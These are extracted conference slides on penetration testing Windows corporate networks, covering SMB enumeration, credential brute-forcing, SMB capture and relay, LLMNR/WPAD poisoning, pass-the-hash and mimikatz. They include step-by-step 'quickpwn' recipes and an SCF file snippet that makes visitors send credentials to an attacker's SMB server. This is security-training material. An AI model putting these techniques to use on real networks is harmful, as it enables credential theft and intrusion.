pwning corporate networks in a single day by paulino calderon pale

PWNING NETWORKS IN A SINGLE DAY

#CAT /ETC/ABOUT

PAULINO CALDERÓN PALETWITTER: @CALDERPWNGITHUB: GITHUB.COM/CLDRN/WWW.CALDERONPALE.COM

THINGS I LEARNED

• 99% OF THE TIME IT WILL BE WINDOWS.• MOST OF THE VULNERABILITIES ARE UNKOWN UNTIL

COMPANIES GET PROFESSIONAL HELP.• NO ONE KNOWS WHAT SOFTWARE IS INSTALLED.• DEFAULT CONFIGURATIONS ARE DANGEROUS.

SMB3.0 3.02

1.02.0

2.1

SMB IS OUR FRIEND

SMB IS THE MOST TARGETED PROTOCOL IN WINDOWS NETWORKS.

WITH SMB:• OBTAIN OS AND ACTIVE DIRECTORY INFORMATION.• STEAL USER NETWORK CREDENTIALS.• ACCESS SHARED FOLDERS.• TEST CREDENTIALS.• EXECUTE COMMANDS OR BINARIES REMOTELY (PSEXEC, WMI,

POWERSHELL…)• A LOF OF VULNERABLE IMPLEMENTATIONS (SERVERS AND CLIENTS)…

DOMAIN CONTROLLERS

• A LOT OF DOMAIN CONTROLLERS ACCEPT NULL SESSIONS.

• THIS INSECURE CONFIGURATION REVEALS INFORMATION ABOUT USERS AND GROUPS.

• WE CAN USE THIS VULNERABILITY TO TARGET HIGH PRIVILEGED USERS.

OBTAINING INFORMATION FROM A DOMAIN CONTROLLER

LINUXENUM 0.9 SAVES USERS IN TEXT FILES DIVIVED BY DOMAIN GROUPS. THE OUTPUT CAN BE USED BY NMAP AND METASPLOIT.DOWNLOAD: HTTPS://GITHUB.COM/CLDRN/ENUM4LINUX-0.9

DOMAIN\USER

OBTAINING INFORMATION FROM DOMAIN CONTROLLERSPOLENUMOBTAINS PASSWORD POLICY FOR A DOMAIN

DOWNLOAD FROM HTTPS://LABS.PORTCULLIS.CO.UK/TOOLS/POLENUM/

“QUICKPWN”

• IDENTIFY DCS• EXECUTE ENUM4LINUX 0.9$ENUM4LINUX –A <IP>• EXECUTE POLENUM TO OBTAIN THE PASSWORD AND

ACCOUNT LOCKOUT POLICIES.POLENUM <IP>• LAUNCH BRUTE FORCE ATTACK TO FIND ACCOUNTS WITH

WEAK PASSWORDSMETASPLOIT: AUXILIARY/SCANNER/SMB/SMB_LOGINNMAP: SMB-BRUTE

SHARED FOLDERS

• ENABLED TO ALLOW PEOPLE TO SHARE FILES OVER THE NETWORK.

• NOT UNCOMMON TO FIND SENSITIVE INFORMATION STORED THERE.

“QUICKPWN”

• FIND SENSITIVE INFORMATION IN SHARED FOLDERS:• FILE LOCATOR LITE O PRO (WWW.MYTHICSOFT.COM)• SMBMAP

STEALING USER CREDENTIALS

• THERE ARE SEVERAL TECHNIQUES THAT CAN BE USED TO ABUSE SHARED FOLDERS TO OBTAIN USER CREDENTIALS.

• NO PATCH (VULNERABLE BY DESIGN).

THE CLASSIC SMB CAPTURE ATTACK

AS EASY AS SETTING UP A SMB SERVER AND WAITING FOR USERS TO SEND US THEIR DOMAIN CREDENTIALS…

DEMO

WHO HAS THE TIME TO WAIT?

UNC PATHS

\\<MACHINE>\<FOLDER>\<FILE>

WHERE CAN WE USE UNC PATHS?

• WEB APPLICATIONS/SHAREPOINT/YOUR OWN WEB SERVER• SQL QUERIES• OFFICE DOCUMENTS• LMHOSTS.SAM <- HOST YOUR OWN MALICIOUS HOSTS FILE• LNK FILES• SCF FILES <- EASIER TO CREATE THAN LNK FILES

“QUICKPWN”

• FIND SHARED FOLDER WITH WRITE PERMISSIONS.• UPLOAD A FILE CONTAING A UNC PATH POINTING TO

YOUR SMB SERVER.• WAIT FOR THE CREDENTIALS…

SCF FILES

[SHELL]COMMAND=2ICONFILE=\\<IP ADDRESS>\SHARE\PWN.ICO[TASKBAR]COMMAND=TOGGLEDESKTOP

DEMO

SMB RELAY ATTACKS

IF SMB SIGNING IS DISABLED, SMB RELAY ATTACKS ARE POSSIBLE.

99.9% SMB SIGNING IS DISABLED ON WINDOWS WORKSTATIONS. (DEFAULT CONFIGURATION)

DEMO

“QUICKPWN”

• FIND A SHARED FOLDER WITH WRITE PERMISSIONS.• UPLOAD A FILE WITH A UNC PATH POINTINT TO YOUR OWN

SMB SERVER.• USE SMBRELAYX.PY TO REDIRECT THE CONNECTION TO

YOUR VICTIM AND GAIN ACCESS TO THE MACHINE WHEN A USER WITH ENOUGH PRIVILEGES CONNECTS…

CAN YOU FORCE USERS TO CONNECT TO US?

• THE PREVIOUS ATTACK TECHNIQUES NEEDED:• USERS CONNECTING TO OUR SMB SERVER• ACCESS TO A SHARED FOLDER WITH WRITE PERMISSIONS

BUT CAN WE USE POISONING ATTACKS TO FORCE USERS TO CONNECT TO US?

THANK YOU WPAD

• ENABLED BY DEFAULT IN ALL WINDOWS VERSIONS.

• DESIGNED TO AUTO CONFIGURE PROXIES IN NETWORKS.

• INTERNET OPTIONS>LAN SETTINGS>AUTOMATICALLY DETECT SETTINGS

LLMNR Y NBT-NS

• ENABLED IN MOST WINDOWS MACHINES.• LLMNR (LINK-LOCAL MULTICAST NAME RESOLUTION)

<-STARTING FROM WINDOWS VISTA• NBT-NS (NETBIOS NAME SERVICE)• ALLOWED IN A LOT OF NETWORKS WITH

RESTRICTIVE ACCESS.

“QUICKPWN”

• DETECT WPAD/LLMNR/NBT-NS REQUESTS ON THE NETWORK

• LAUNCH A SMB SERVER TO CAPTURE USER CREDENTIALS.

• FORCE USERS TO CONNECT TO YOU TROUGH POISONING ATTACKS.

• CAPTURE THE USER CREDENTIALS.

DEMO

DEMO

DEMO

PASS THE HASH

• IT HAS BEEN AROUND FOR ALMOST 20 YEARS NOW.• A LOT OF WINDOWS PROTOCOLS REQUIRE THE HASH OF THE PASSWORD

BUT NOT THE ACTUAL PASSWORD TO AUTHENTICATE.• A LOT OF TOOLS AVAILABLE SUPPORT PTH:

• PTH-WINEXE, MIMIKATZ,• METASPLOIT: PSEXEC_COMMAND, PSEXEC

PTH AGAINST RDP

MICROSOFT INTRODUCED“RESTRICTED ADMIN” MODE, NOW, WE CAN USE PTH AGAINST RDP IN WINDOWS 2012 R2 AND WINDOWS 8.1. (ONLY ADMIN)

MEET PSEXEC

• USEFUL TO LOCATE SYSTEMS THAT SHARE PASSWORDS.

• RUNS COMMANDS OR BINARIES REMOTELY ON MACHINES.

• IT IS VERY NOISY.

DEMO

WDIGEST

• AUTH SYSTEM THAT REQUIRES THAT WINDOWS STORES A PLAINTEXT VERSION OF THE PASSWORDS IN MEMORY.

• WCE, MIMIKATZ FTW

CREDMAP – THE CREDENTIAL MAPPER

DEVELOPED BY ROBERTO SALGADO FROM WEBSEC TO QUICKLY TEST CREDENTIALS AGAINST DIFFERENT SERVICES ONLINE

DOWNLOAD: HTTPS://GITHUB.COM/LIGHTOS/CREDMAP

DEMO

WMI

• PSEXEC ALTERNATIVE• DOES NOT START A SERVICE• DOES NOT TOUCH THE DISK• IN KALI: WMIEXEC Y PTH-WMIS

PENTESTERS LOVE POWERSHELL

POWERSHELL CAN BE USED FROM NETWORK RECONNAISSANCE TO PRIVILEGE ESCALATION.

PROJECTS WORTH MENTIONING:• POWERSPLOIT:

HTTPS://GITHUB.COM/POWERSHELLMAFIA/POWERSPLOIT/• EMPIRE:

HTTP://WWW.POWERSHELLEMPIRE.COM

SMB1 VS SMB2 VS SMB3

• MOST TOOLS ONLY WORK WITH SMB1. (FOR NOW)• SMB2 REMOVES OS FINGERPRINT INFORMATION PRE AUTH.• SMB3 FINALLY INTRODUCES MESSAGE ENCRYPTION.

DEMO

OTHER “QUICKPWNS”

• GOLDEN TICKET KERBEROS• OUTDATED SOFTWARE• SERVICES WITH EXCESSIVE PERMISSIONS• MISCONFIGURED NETWORK PRINTERS• DEVELOPMENT ENVIRONMENTS WITH INSECURE CONFIGURATIONS• INSECURE UPDATE SYSTEMS (*)

DEMO

WHAT OTHER VULNERABILITIES ARE WORTH MENTIONING?

SPAM

OWASP RIVIERA MAYA

NMAP: NETWORK EXPLORATION AND SECURITY AUDITING COOKBOOK 2ND EDITION

WEBSEC OFFICIAL CHANNELS

• WWW: WWW.WEBSEC.MX• YOUTUBE: YOUTUBE.COM/WEBSECMX• FACEBOOK: WEBSEC.MX• TWITTER: @_WEBSEC

CONTACT

PAULINO CALDERÓN PALETWITTER: @CALDERPWNGITHUB: GITHUB.COM/CLDRN/WWW.CALDERONPALE.COM